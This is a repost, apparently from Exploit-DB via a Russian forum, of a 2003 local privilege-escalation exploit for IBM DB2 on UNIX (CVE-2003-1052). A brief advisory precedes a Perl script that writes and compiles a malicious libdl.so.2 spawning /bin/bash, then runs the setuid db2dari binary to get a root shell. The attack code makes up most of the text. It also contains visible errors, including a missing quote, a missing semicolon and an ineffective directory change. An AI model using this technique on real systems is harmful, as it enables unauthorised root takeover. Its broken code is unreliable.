- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22989
- Проверка EDB
-
- Пройдено
- Автор
- [email protected]
- Тип уязвимости
- LOCAL
- Платформа
- UNIX
- CVE
- cve-2003-1052
- Дата публикации
- 2003-08-05
Код:
source: https://www.securityfocus.com/bid/8346/info
IBM DB2 ships with a number of shared libraries, stored in a directory owned by the user and group 'bin'. As setuid root utilities are linked to these libraries, their ownership by a user and group of a lower privilege level constitutes a vulnerability. If an attacker can obtain user or group bin privileges, the shared libraries can be overwritten with malicious replacements designed to obtain root privileges from the setuid root utilities that use them.
#!/usr/bin/perl
#IBM DB2 local root from uid=bin
#deadbeat,
#e: [email protected]
#e: [email protected]
print "\nIBM db2 local bin escape to root sploit\n";
print "Preparing exploit...\n";
system("cd /usr/IBMdb2/V7.1/lib");
open FILEHANDLE, (">foo.c")or die "Cant open foo for writing..:(\n";
print FILEHANDLE "#include <stdio.h>\n";
print FILEHANDLE "#include <string.h>\n\n";
print FILEHANDLE "_init() {\n";
print FILEHANDLE "\tprintf(\"init..()\\n\");\n";
print FILEHANDLE "\tprintf(here we go: PID=\%i EUID=\%i\", getpid(), getuid());\n";
print FILEHANDLE "\tsystem(\"/bin/bash\");\n";
print FILEHANDLE "\tprintf(\"wicked done and dusted..\\n\")\n";
print FILEHANDLE "}";
close FILEHANDLE;
system("gcc -fpic -shared -o libdl.so.2 foo.c");
exec("db2dari")- Источник
- www.exploit-db.com
